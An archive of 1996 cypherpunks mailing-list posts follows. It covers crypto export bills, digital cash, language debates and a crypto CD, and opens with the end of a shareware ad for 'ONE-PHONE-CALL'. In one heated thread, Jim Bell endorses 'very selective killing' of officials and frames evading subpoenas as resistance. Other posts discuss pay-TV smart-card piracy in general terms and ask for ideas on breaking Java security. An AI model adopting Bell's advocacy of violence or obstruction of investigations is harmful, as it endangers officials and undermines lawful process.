Or perhaps you decide to send him an electronic version of the report, via 
his EMail account. You might:
... Format the document properly for the EMail service to accept
... Dial the EMail service, connect, log-in, and all the rest
... Transmit the report
... Call him back to tell him the report is on the EMail service
... Your co-worker connects to the EMail service
... He downloads the report
... He calls you back.

At least four phone calls!  And who knows how much money and effort?

Now with ONE-PHONE-CALL, you can accomplish the same task with your original 
phone call.  You and your co-worker can stay on the phone and transfer the 
information back and forth as many times as necessary, without having to make 
another phone call!

A second example demonstrates a more complex problem.  The ability to 
transfer information when you don't know exactly what information needs to be 
transferred.

You have just received a copy of a great new shareware game from the XYZ 
Software Company.  Your brother shares your liking for this company's 
software and you have exchanged previous shareware games with him.  
It's a great game and you're pretty sure he'll want a copy too.

Without ONE-PHONE-CALL, you have two obvious choices.  First, you could 
upload all the software to his EMail account (see above!) and maybe call him 
to tell him it's there, or you could copy the software to a floppy disk and 
mail it to him.  If you go the EMail route, you're out the upload time and 
several dollars. (So is he, on the other end.)  If you go with the Postal 
Service, you're out a buck or so for a floppy and some postage and the 
software gets there days later.

With ONE-PHONE-CALL, it's as simple as calling him, finding out if he wants 
the software, and sending it right then and there!  ONE-PHONE-CALL will even 
figure out what software he needs (perhaps several of the files are the same 
as in previous games) and will only send the new files that he doesn't 
have, and update any files that are out-of-date.

We can extend this example to many specific problem areas:

You own a software company that operates a customer service line for help 
with your products.  If your customer needs an updated version of the 
software, you can upload the new software to him immediately, 
sending him only what he needs, during the one phone call the customer has 
made to your company.  Result! a happy customer.

A friend is having a problem with his computer.  You suspect he may have a 
problem with one of his configuration files such as CONFIG.SYS,  AUTOEXEC.BAT 
or one of his Windows INI files. Without using the capabilities of 
ONE-PHONE-CALL he is either reading you the text of the file over the phone 
(yea, right!) or he is printing it out to fax it or mail it to you.  You get 
the listing (maybe days from now) and find the problem.  You need him to edit 
his CONFIG.SYS file to fix the problem. "How do I do that?"  he asks. You get 
the idea.

With ONE-PHONE-CALL, he simply sends you the files, you edit them on your 
computer, and send them back, he reboots, and the problem is solved.  All 
with ONE-PHONE-CALL.

Our final example highlights the security aspects of electronic information 
transfer.

Have you ever sent a fax and wondered if it went to the wrong machine?  Did 
you dial that number correctly?  Or did you wonder if it was "eaten" by the 
machine? or was read by the wrong people? or fell into the "black hole" of 
cyberspace?  Have you ever wanted to send some confidential information but 
didn't "quite trust" your on-line service?  Have you ever wanted to make sure 
the right person and ONLY that person sees your communication?  Without 
ONE-PHONE-CALL, the electronic exchange of confidential information  can be 
very difficult.  With ONE-PHONE-CALL, your life just got much easier.

Here's a hyperbolic example but it makes the point:

You have been away at your summer retreat working on the company annual 
report and budget.  It is FULL of confidential information.  You need to send 
it to your CFO back at the office for review and the insertion of some 
background information that he has in his computer.  How do you get it to 
him?

With ONE-PHONE-CALL, you call his office, get him on the phone, and send the 
document!  You KNOW you dialed the right number.  You KNOW you have the right 
person on the line. And by using the encryption feature of the software, you 
can even deter access to your information in the event of a wiretap.

How do you do that without ONE-PHONE-CALL?

Minimum System Requirements

ONE-PHONE-CALL runs under Windows 95, Windows 3.1 or MS-DOS.

System Requirements:
For operation under Windows 3.1 or higher:
IBM-compatible PC (386 or higher)
4 mb of RAM memory, 8 mb recommended
Mouse
Hard drive with at least 1 MB of free space
1200, 2400, 9600, 14.4K, 28.8K modem
For operation under MS-DOS 3.11 or higher
IBM-compatible PC (8088 or higher, 80286 or higher recommended)
640 kb of RAM memory
Mouse recommended
Hard drive with at least 1 MB of free space
1200, 2400, 9600, 14.4K, 28.8K modem


Best Regards,


Joe

JDonth@gnn.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 30 Mar 1996 15:02:28 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <m0u2oJE-0008yhC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960329193830.15388J-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



This will be my last comment on this thread.  Mr. Bell is beginning to 
lapse into the "yadda yadda yadda" phase.  Constructive progress becomes 
nil at this point typically.



On Fri, 29 Mar 1996, jim bell wrote:

> At 05:06 PM 3/29/96 -0500, Black Unicorn wrote:

> >> Ultimately, your repeated argument is simply, "The legal system can be 
> >> abused by those who work in it."
> >
> >I wouldn't call fines imposed on a third party who clearly was complicit 
> >in the destruction of material evidence to a proceeding "abuse."
> 
> Since you keep inventing these straw men and knocking them down, it is 
> really questionable whether you have any kind of good judgment as to who is 
> "clearly complicit in the destruction of material evidence."

My judgment is not important.  What I have seen courts do is.

> It would be far more effective and credible if you would at least admit that 
> not every action by a third party which has the effect of frustrating some 
> court is actionable.  The simple action of FAILING to store information that 
> may later be wanted by the officials is an excellent example, for instance.

I never claimed anything so broad.  I pointed out that the examples you 
gave (tipping off the offender that he was being investigated, creating 
provisions to destroy or otherwise make unavailable evidence material to 
a criminal or civil investigation), were going to have to confront these 
problems.

> 
> Naturally, you won't like this either.  And you certainly won't want 
> to rise to my challenge and draw a distinct line, because that would put 
> you to your proof, and you have none.

Mostly because there is no distinct line.  You make your argument to the 
judge, he makes his ruling based on his perceptions and bias.  Sometimes 
you win, sometimes you lose.  When "offshore holding agent" or "trustee" 
is mentioned in the context of "unavailable" evidence, judges are not 
very patient.  Of course, your only response to this is "so kill them."  
Unfortunately, in the absence of your system, that's not much of an option.

> >Yadda yadda yadda.
> 
> What?!?  you don't have a better response to this?

I don't talk to feces on the sidewalk either.

> >Sure, several.  See my large note on the subject of asset protection.
> 
> Well, you're trying to change the subject.  It's "escrow agents."  And the 
> question is, "must an escrow agent always know the identity of the people 
> for whom the information is kept."  The simple answer, invoking existing 
> software technology, is, "no."  

No, that's not the question.  This question you just invented.  The 
question was, and specifically in reference to your "rosebud" tip-off 
scheme, can an escrow agent warn the principal of an impending 
investigation with the intent of facilitating the destruction or 
diversion of material evidence.

Of course, having this scheme debunked forced you to alter the facts, yet 
again, to favor you.

> So now you need to explain why courts are going to be able to force a 
> third-party to give what he doesn't know he has, and in fact nobody else 
> knows either.  You'll fail at this task, of course, because the answer is 
> not politically correct by your standards.

Again, you have to convince the judge of all this, and even if it is 
true, he doesn't have to buy it, can still impose fines, and can still 
jail the third party until he is convinced he/she is either telling the 
truth, or is very determined no to release the information at any cost to 
self.

Even if you can show that the third party is faultless, the principal is 
probably going to suffer the same fate.

> >My hostility is for a system that allows mob mentality and murder run the 
> >streets like a bad day in Beruit.
> 
> A position which fails to do anything about the current problems in society. 

The only way to do anyhting about the "current problems" in society is to 
kill and threaten?  Move to East Turkey.

>  Show me that my solution is worse than the status quo, and you'll have a 
> point.  Until then, you're just a complainer.

Considering it combines the tyranny of the majority with the tyrrany of 
the minority and provides both with sovereign powers to sentence 
individuals to death arbitrarily....

I'll leave the rest to the reader.

> >Actually I should have said "material."
> 
> Still sloppy.  Classic Unicorn.

Pay me my hourly rate and I will be happy to copy-edit everything I post.

For legal work involving international transactions or compulsary 
jurisdiction issues that tends to run $200-$300/hr.

> >I don't much like the system in the United States either.  But there are 
> >two ways around it.  Ways that work, and ways that don't.
> 
> There are not ONLY "two ways around it."  There are also clearly "ways that 
> Unicorn likes" and "ways Unicorn doesn't like."

I admit that ways that I don't like may work.  Your's wont.

> >Encouraging random murder and mob justice is, in my view, in the second 
> >field.
> 
> I've never encouraged "random murder."  Quite the opposite:  It would be far 
> more accurate to say that I encourage VERY SELECTIVE killing.  It is not, 
> however, GOVERNMENT SPONSORED killing, which is why you won't like it.

Encouraging selective murder and mob justice is, in my view, in the second 
field.

You know, if Mr. Bell turned out to be L.D., he'd be violating our 
settlement agreement.

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Pingitore" <Adam_Pingitore@alli.wnyric.org>
Date: Fri, 29 Mar 1996 20:00:51 +0800
To: Jonathon Blake <hwh6k@fulton.seas.virginia.edu
Subject: Re[2]: Crypto CD UpDate
Message-ID: <9602288280.AA828043590@ccmail.wnyric.org>
MIME-Version: 1.0
Content-Type: text/plain


          Um, why am I getting mail from you people.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: editor@cdt.org (Bob Palacios)
Date: Fri, 29 Mar 1996 20:13:51 +0800
To: cypherpunks@toad.com
Subject: CDT Policy Post 2.12 - Sen. Burns Announces New Bill To Lift Crypto ExportControls
Message-ID: <v02130506ad80c5994107@[204.157.127.16]>
MIME-Version: 1.0
Content-Type: text/plain


-----------------------------------------------------------------------------
   _____ _____ _______
  / ____|  __ \__   __|   ____        ___               ____             __
 | |    | |  | | | |     / __ \____  / (_)______  __   / __ \____  _____/ /_
 | |    | |  | | | |    / /_/ / __ \/ / / ___/ / / /  / /_/ / __ \/ ___/ __/
 | |____| |__| | | |   / ____/ /_/ / / / /__/ /_/ /  / ____/ /_/ (__  ) /_
  \_____|_____/  |_|  /_/    \____/_/_/\___/\__, /  /_/    \____/____/\__/
  The Center for Democracy and Technology  /____/     Volume 2, Number 12
----------------------------------------------------------------------------
     A briefing on public policy issues affecting civil liberties online
----------------------------------------------------------------------------
 CDT POLICY POST Volume 2, Number 12                       March 28, 1996

 CONTENTS: (1) Sen. Burns Announces New Bill To Lift Crypto Export
               Controls
           (2) Subscription Information
           (3) About CDT, contacting us

This document may be redistributed freely provided it remains in its entirety
       ** Excerpts may be re-posted by permission (editor@cdt.org) **
-----------------------------------------------------------------------------

(1) SENATOR BURNS ANNOUNCES BILL TO LIFT CRYPTO EXPORT CONTROLS

The battle to roll back the Clinton Administration's encryption policy
escalated on Thursday when Senator Conrad Burns (R-MT) announced that he
will introduce a new proposal to repeal restrictions on encryption exports
and to encourage the growth of electronic commerce. Senator Burns announced
the bill via a teleconference during a special session at the Computers,
Freedom, and Privacy Conference in Boston, MA.

The bill, titled the "Promoting Commerce On-Line in the Digital Age Act"
(PROCODE), joins two recent bills introduced earlier this month (S. 1587
and HR 3011) designed to encourage the development of strong, easy-to-use
privacy and security products for the Internet.

The Burns bill is different from the other proposals in several respects.
Specifically, the latest bill does not contain any new criminal provisions
or provisions imposing liability on third party key holders.

In his presentation today at CFP, Sen. Burns outlined his new bill. Among
other things, the "Promoting Commerce On-Line in the Digital Age Act"
would:

* Allow for the unrestricted export of "mass-market" or "public-domain"
  encryption programs, including such products as Pretty Good Privacy
  and popular World Wide Web software. Encryption software and hardware
  for sale in local software stores or widely available on the Internet
  would all be exportable under the proposed Act.

* Require the Secretary of Commerce to allow the unrestricted export of
  other encryption technologies if products of similar strength are
  generally available outside the United States.

* Prohibit the Federal Government from imposing mandatory key-escrow
  encryption policies on the domestic market.

* Limit the authority of the Secretary of Commerce to set standards for
  encryption products.

CDT applauds this effort by Senator Burns to put strong privacy and
security technologies in the hands of individuals and businesses. CDT is
also pleased that the Senator chose the Computers, Freedom, and Privacy
Conference as a forum to announce this proposal. The choice of CFP
demonstrates that the Internet community is becoming an increasingly
important political constituency.

CDT looks forward to working with Senator Burns and other members of
Congress interested in policies which encourage the development and
widespread use of strong privacy protecting technologies for the Global
Information Infrastructure.

FOR MORE INFORMATION

For more information on the cryptography policy debate, including the text
of Senator Burns' proposal when available, visit CDT's Cryptography Issues
Web Page:

http://www.cdt.org/crypto/

Contacts:

Center for Democracy and Technology  +1.202.637.9800
 Daniel Weitzner, Deputy Director, <djw@cdt.org>
 Alan Davidson, Staff Counsel, <abd@cdt.org>

-------------------------------------------------------------------------
(2) SUBSCRIPTION INFORMATION

Be sure you are up to date on the latest public policy issues affecting
civil liberties online and how they will affect you!  Subscribe to the CDT
Policy Post news distribution list.  CDT Policy Posts, the regular news
publication of the Center For Democracy and Technology, are received by
more than 9,000 Internet users, industry leaders, policy makers and
activists, and have become the leading source for information about
critical free speech and privacy issues affecting the Internet and other
interactive communications media.

To subscribe to CDT's Policy Post list, send mail to

     policy-posts-request@cdt.org

with a subject:

     subscribe policy-posts

If you ever wish to remove yourself from the list, send mail to the
above address with a subject of:

     unsubscribe policy-posts

-----------------------------------------------------------------------
(3) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US

The Center for Democracy and Technology is a non-profit public interest
organization based in Washington, DC. The Center's mission is to develop
and advocate public policies that advance democratic values and
constitutional civil liberties in new computer and communications
technologies.

Contacting us:

General information:  info@cdt.org
World Wide Web:       URL:http://www.cdt.org/
FTP                   URL:ftp://ftp.cdt.org/pub/cdt/

Snail Mail:  The Center for Democracy and Technology
             1634 Eye Street NW * Suite 1100 * Washington, DC 20006
             (v) +1.202.637.9800 * (f) +1.202.637.0968

-----------------------------------------------------------------------
End Policy Post 2.12                                           3/28/96
-----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Fri, 29 Mar 1996 20:18:27 +0800
To: Jonathon Blake <grafolog@netcom.com>
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <Pine.3.89.9603272237.A8448-0100000@netcom3>
Message-ID: <Pine.SV4.3.91.960328182325.8987E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


<< "You can't get a non-Federal job in South Florida if you don't speak 
Spanish" >>

    Wrong.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Fri, 29 Mar 1996 20:25:23 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: What backs up digital money?
In-Reply-To: <199603280546.VAA02513@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.960328161610.1406G-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 27 Mar 1996, Hal wrote:

> I have to disagree somewhat with a few points Mike made.  I would say
> that gold and diamonds do have intrinsic value, based on their beauty
> and the desire of people to own them.  I think it is too simplistic to
> denigrate these desires as the product of advertising.  The feelings that
> people have which make them desire these things are as legitimate as
> other forms of desire.


Take a look at the frontline piece on DeBeers, (there's also a good 
"Nova" on the subject) has some very interesting points which tend to 
support the view that the value of diamonds is almost entirely dependent 
on marketing and public perception.

At one time I had some works which supported this view as well.  I'll try 
to find pointers to them again.

[...]

> A particular issue of "digital cash" could be denominated or backed by
> anything the issuer thinks there is a market for.

Diet coke?  :)

[...]

> 
> Hal
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Fri, 29 Mar 1996 20:29:38 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto CD
Message-ID: <960328194536.20200293@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain



At 01:52 AM 3/24/96 -0500, Ben Holiday wrote:

>I would plan to put unix/dos/mac all on one CD. I'm thinking that 
>realistically I can expect 50 megs or so. Possibly as much as 100 if I 
>find a TON of wonderful text. 

	I burned one such CD this last fall. Oh, well, it wasn't for
publishing, although I thought of that at the time. It was mainly to
be able to move with me all my data when I switched positions.

	I included all the Cypherpunks archives, and several international
FTP crypto sites in full (ya know, the italian, australian, english, pgp,
etc... places). It was well over your "50 megs". And I would find that 
pretty more useful (if I hadn't it already). :-)

	Oh, I'm lying. I also did a "purged" version to remove duplicated
packages first, when I didn't know if I would have enough sapce in the
few CDs I had to burn in the few days I had left. I seem to remember that
wasn't as big and maybe in the range that you mentioned. But it was 
compressed, and hence its usefulnes now is somewhat less since I have to
expand everything if I want to get it. I was filling the CDs with other
"important to me" stuff, and wanted to save space, but having the space
available I don't see any reason not to expand the material.

	What I'd suggest is a compilation of all main archives, purged
from duplications, rearranged rationally (I have it just in the original
hierarchies) and all expanded for direct access.

	If you add to that executables for most packages compiled for a
few popular platforms (Mac, PC, Linux and FreeBSD come to mind), I'd bet
that you'd get a far greater amount of space.

	But that's a lot of additional work though. I know from experience.
It might do for a very nice cypherpunk project. Although, there still
remains the "trustfulness" of the product: how can the final user know
that the sources, executables, key databases, etc... have not been
tampered with? From the original archives one has the truth one poses 
on them, but from a copy, one needs to trust the copier. And if it became
a multi-person project, all the people involved...

	But it's well worth a thought o two. If it helps you, my CDs are
probing now invaluable to me.

				jr





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 29 Mar 1996 20:34:11 +0800
Subject: No Subject
Message-ID: <199603291234.UAA12135@infinity.nus.sg>
MIME-Version: 1.0
Content-Type: text/plain


os <os@cs.strath.ac.uk> writes:

> >There is not a single foreign language I can think of it that would help me
> >in my goals or help anyone I know.
>
> I have never known anyone being disadvantaged by knowing another language tha
> tongue.

Tim (and others) miss out the pleasure of using an exotic language in the
presense of people who won't understand it.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rollo@artvark.com (Rollo Silver)
Date: Sat, 30 Mar 1996 16:39:26 +0800
To: cypherpunks@toad.com
Subject: java security
Message-ID: <v02130504ad82540e495c@[198.59.115.164]>
MIME-Version: 1.0
Content-Type: text/plain


>Based on recent events, as soon as you implement anything in Java you are
>making the creation of a secure ANYTHING a highly uncertain venture.  You
>have just made it MUCH MORE difficult to ensure security, not less,
>given the current state of the Java art.

I will be spending a fair part of my time over the next few months
investigating java security, especially from the point of view of trying to
break it.

I'd like to hear from coderpunks/cypherpunks having ideas about how to
break it, especially if you don't have the time/energy to pursue the idea
to fruition yourself.

Rollo Silver                | e-mail: rollo@artvark.com                  |
Artvark                     | Home page: http://www.artvark.com/artvark/ |
PO Box 219                  | Voice: 505-586-0197                        |
San Cristobal, NM 87564 USA | Compuserve 71174,1453                      |
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 29 Mar 1996 20:49:10 +0800
To: Alan Horowitz <alanh@mailhost.infi.net>
Subject: Re: What backs up digital money?
In-Reply-To: <Pine.SV4.3.91.960328001046.9153E-100000@larry.infi.net>
Message-ID: <199603281526.KAA02714@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alan Horowitz writes:
> I will put forth the proposition that Federal Reserve "Notes" are not 
> notes.

Probably true, but not relevant here on cypherpunks.

Same, by the way, with discussions of whether Americans are ignorant
pig dogs for not speaking forieign languages and lots of other stuff
that has been posted of late.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kooltek@iol.ie (Hack Watch News)
Date: Sat, 30 Mar 1996 17:13:23 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Cable-TV-Piracy-Punks
Message-ID: <199603292053.UAA18333@GPO.iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


>"David K. Merriman" <merriman@arn.net> writes:
>
> > At 01:34 AM 03/28/96 +0000, you wrote:
>
> >> I've been looking for a file on how to make PPV
> >> descramblers and havn't found any. Commercial descramblers
> >> cost around $200 base price. If anyone has a file on how to
> >> make them please e-mail me one.  Thanks.
>
> > This is cypherpunks. Not Cable-TV-Piracy-Punks.
>
>ObCrypto: Scrambling TV signals sometimes makes use of
>encryption, so perhaps a brief discussion of how this is done
>could be tolerated.
>
>If you are talking about recovering signals from completely
>encrypted digital MPEG-2 streams, such as those used by the DBS
>folks, you are probably out of luck.  The relevant processing in
>the decoder exists on a small card which has so far resisted
>attempts at reverse engineering.
>

The DSS smart card has been reverse-engineered for at least six months now
and pirate devices are in the market. The encryption used on those systems
is good but it does not stand up to a well financed attack. In the European
version of the system, the encryption routines were using a hashing
function. The input packet also carried the authorisation data so it was
using this as an input packet. The DSS routine is probably based on a
similar hashing routine.

>There are a variety of techniques for scrambling audio.  The most
>expensive is to DES encrypt the sound and place it in the
>horizontal blanking interval.  The regular sound channel can then
>be used for advertising.  This requires a bit of processing at
>both ends, and is generally used for satellite to ground
>transmission of cable signals.  The other common method is to
>modulate the sound on a subcarrier, usually the one transmitted
>in phase with the missing sync.
>

Using DES to encrypt the audio on the fly is an old technique and was used
in the VideoCipher II system. Most of the more recent systems use a PRNBSG
EXORed with the digital audio data stream. 


>Of course, once television transmission goes completely digital,
>and strong encryption is used on both audio and video, the
>opportunity for such simple attacks will vanish.
>

The problem of piracy will still exist on digital systems. The DSS system is
a completely digital system and it too is hacked. Admittedly some of the
elements of security in the DSS are good, most can be rendered void by
hackers. The problem for DSS is that the smart card they used is not secure
enough. It was a Motorola 6805 type. What appears to be the pattern with the
hacks on more recent smart card systems is an inversion of the original
pattern on the simple analogue systems. The original pattern was that some
hobbyists would figure out how to hack the system and then the hack would be
commercialised. With the smart card hacks - the pattern is inverted so that
it becomes a trickle down pattern. The professional hackers reverse and
emulate the smart card and then the code is sometimes hacked from the
emulator card and then distributed among hobbyists.

The most dangerous thing in all this is that the smart cards that have been
hacked in Pay TV systems throughout the world are also used in other
applications. The expertise and the knowledge of reversing smart cards is
now more common in the Pay TV piracy business. There is always the
possibility that these skills could be applied elsewhere.

Regards...jmcc
********************************************
John McCormac            * Hack Watch News
jmcc@hackwatch.com       * 22 Viewmount, 
Voice&Fax: +353-51-73640 * Waterford,
BBS: +353-51-50143       * Ireland
********************************************

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6

mQCNAzAYPNsAAAEEAPGTHaNyitUTNAwF8BU6mF5PcbLQXdeuHf3xT6UOL+/Od+z+
ZOCAx8Ka9LJBjuQYw8hlqvTV5kceLlrP2HPqmk7YPOw1fQWlpTJof+ZMCxEVd1Qz
TRet2vS/kiRQRYvKOaxoJhqIzUr1g3ovBnIdpKeo4KKULz9XKuxCgZsuLKkVAAUX
tCJKb2huIE1jQ29ybWFjIDxqbWNjQGhhY2t3YXRjaC5jb20+tBJqbWNjQGhhY2t3
YXRjaC5jb20=
=sTfy
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mike@fionn.lbl.gov (Michael Helm)
Date: Fri, 29 Mar 1996 20:51:29 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <llurch@networking.stanford.edu>
Message-ID: <199603281708.JAA05726@fionn.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Mar 27,  1:05pm, Rich Graves wrote:
> Undeniably true. I think Tim's point was more, "Who cares?  Everyone *I*
> want to talk to speaks English."

Maybe; & who someone talks to & how they do it is of no particular
interest to me.  However, he said something else: that foreign
language speakers were unavailable to most Americans.  This is easily
shown to be false.  That many other people in our English-speaking
community also believe it is interesting.  Often, they can provide
counterexamples themselves without too much trouble (& you may recall
that Tim May did).  This says something about this culture.  What, I don't
know, but it's some kind of cognitive dissonance.

It occurs to me that members of certain large language groups
in the US, who don't speak English, sometimes make the same
statement -- "Everyone I want to talk to speaks X".

I don't know why this disclaimer is necessary, but please note that I
don't think for a moment that you all are "bad" if your beliefs are in
accord with what Tim May wrote.  Nor do I think you should
go out & learn some random language.

> One may quibble with the wisdom or morality of such a statement, but if
> the second statement is true in your case, then there is no reason you
> should have to learn another language. Most upper-income Americans have no

I'm not sure what the "second statement" is you're referring to.
Anyway, there are a lot of reasons one might choose to study
a foreign language, and many levels of fluency.  There are many
economic issues that could apply, & some non - economic arguments
as well.  There are very good reasons not to bother, as well.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Fri, 29 Mar 1996 21:06:34 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why Americans feel no compulsion to learn foreign languages
In-Reply-To: <ad7f8eef2c0210048790@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960328182624.8987G-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Certainly, I believe TCM's proposition that there is no "economic need" 
for an American to learn a second language.

On the other hand, I haven't seen any demonstration of the "value" of 
learning history. Yet, who would argue that ignorance of history is a 
good policy to follow?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 29 Mar 1996 21:54:08 +0800
To: Ted Anderson <ota+@transarc.com>
Subject: Re: PolicyMaker paper available
In-Reply-To: <QlKgYkuSMV0_084k40@transarc.com>
Message-ID: <199603281719.MAA03000@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ted Anderson writes:
> "Perry E. Metzger" <perry@piermont.com> writes:
> > Huh? Postscript an "obscure printer code"?
> 
> I now work from a paperless office and find postscript an "obscure
> printer code".  It has taken an annoying amount of hacking to view this
> postscript file on my PC.

Printer code, yes. Obscure, no.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 30 Mar 1996 23:21:27 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <m0u2tez-0008xlC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:35 PM 3/29/96 -0500, Black Unicorn wrote:
>On Fri, 29 Mar 1996, jim bell wrote:

>> >entails criminal charges?
>> 
>> You _do_ have an odd way with words.  "entails" criminal charges?  Hey, they 
>> can charge ANYBODY with ANYTHING, but that doesn't mean that a crime has 
>> actually been committed.  Further, it isn't clear that anybody is obligated 
>> to respond to a subpoena without the possibility of a court challenge, and 
>> your fantasy about the cops showing up and trying to strongarm the ISP is 
>> laughable at best.  
>
>Ok, forget "entails" try "is a crime."

I think the reason you are so sloppy with language is that you don't want to 
be held to a strict standard of accuracy.  For you, "entails" is 
sufficiently vague that you think you can get away with it.  This kind of 
"abuse the language" behavior is common among lawyers.  Check out the New 
York Times vs. Sullivan SC decision and their odd usage of the term 
"malice":  It's a definition that appeared in no dictionary and (apparently) 
no prior legal decision.  Clearly, lawyers (and especially judges) think 
that they can dynamically re-define the language in order to suit their needs.

 >> Who said anything about "destruction of material evidence"?  Refusing to 
>> hand over information until AFTER a court has properly responded to a 
>> challenge to a subpoena is old hat to newspapers, TV stations, and other 
>> media-organizations who are occasioinally served with a subpoena.  The ISP 
>> need merely say, I'm challenging this subpoena in court, go away 
>> motherfuckers!  ISP prepares a challenge, "CC's" ALL the affected 
>> individuals, (including the person whose information is desired!),  and the 
>> validity of the subpoena is tested.
>
>What you miss are provisions for the preservation of evidence called for 
>in the order during the hearing process. 

Before the challenge occurs?  Hardy har har!  Yes, the evidence WILL be 
preserved, in fully encrypted form.

> The fact that you can fight a 
>subpoena has no bearing what-so-ever on the fact that its a crime to 
>destroy the evidence until the court rules that its non-material or 
>otherwise quashes the subpoena.

Encrypting evidence is NOT "destroying evidence."  Why don't you STOP 
talking about "destroying evidence, because it is clear that you've phonied 
up this assertion to buttress your claims.

>I grow tired of being the source of your continuing legal education.

I'm sure other people are growing tired of your failure to support your 
claims, as well as your failure to recognize the fundamental unfairness of 
the various things you've CLAIMED judges do.  I suspect that any reasonably 
unbiased person would be shocked and astonished at the various behaviors 
you've claimed judges have displayed; he would then understand quite clearly 
why encryption is going to be such an important improvement in future 
society, because it will quickly emasculate the government and its ability 
to do precisely the sort of things you've claimed its agents do.

>Anyone who knows me knows I spend all my days end arounding the 
>U.S. government. 

Explains a lot!   You _are_ paid for this.  In an earlier era, you would 
have gladly run the ovens at Auschwitz if you'd gotten paid for it.

 I'm reminded of that famous New Yorker magazine cover which showed, in 
cartoon form, a picture of Manhattan in the foreground, Jersey in the 
middleground, and the midwest towards the back, then California in the 
distance, etc.  Clearly, you see the government as "Manhattan," occupying 
the vast majority of your scenery, and the rest of the country is clearly 
ignorable in the background.  Chances are good that the reason you aren't 
more bothered at the government's behavior is that, fundamentally, you 
PROFIT from the excesses of the government.

> The reason you can't see that is because I don't 
>threaten to murder officials, but choose the intellectual detour around 
>the myopic laws instead. 


I think you mean, "EXPENSIVE detour."  You know, the one where the lawyers 
on both sides get paid a lot of money, the taxpayers and the victims get 
screwed, etc.  Explains a lot about your motivations.


>What is the function of your elusive super-secret "rosebud" warning 
>then?  To tell the account holder to get a cup of coffee and call the 
>prosecutor to arrange for the delivery of the sought information?

Simple.  I disagree that it is constitutional to prohibit a person from 
informing yet another person (should he be inclined to do so) that he has 
been approached by officials.  I see no support in the Constitution for such 
a tactic, since it is obviously equivalent to prior restraint.  Obviously, 
however, there is a strong motivation for the officials to WANT to keep 
their interest a secret, but people want a lot of things without necessarily 
getting them.  Your problem is that you are unable to admit that this 
practice is of dubious propriety;  the government has been able to get away 
with it because it has dealt with large organizations that depend on it and 
can easily control.  Smaller organizations, like ISP's and such, are run by 
people who aren't quite so contaminated with the "Government is God" 
philosophy, and who are far more likely to get around (or challenge) a old 
tenet that officials had grown to know and love.

>Subjecting the target to compelled discovery orders $50,000+/day 
>fines, contempt charges, and incarceration for non-compliance.  This, by 
>the way, regardless of the "incriminating" nature of the evidence.  Fines 
>are not going to be refunded if the data/evidence is later proved immaterial.

You keep making statements which merely represent abuses of the system.  
What you don't explain is why any judge who does such abusive things 
shouldn't be removed from office, by whatever means necessary.  You would be 
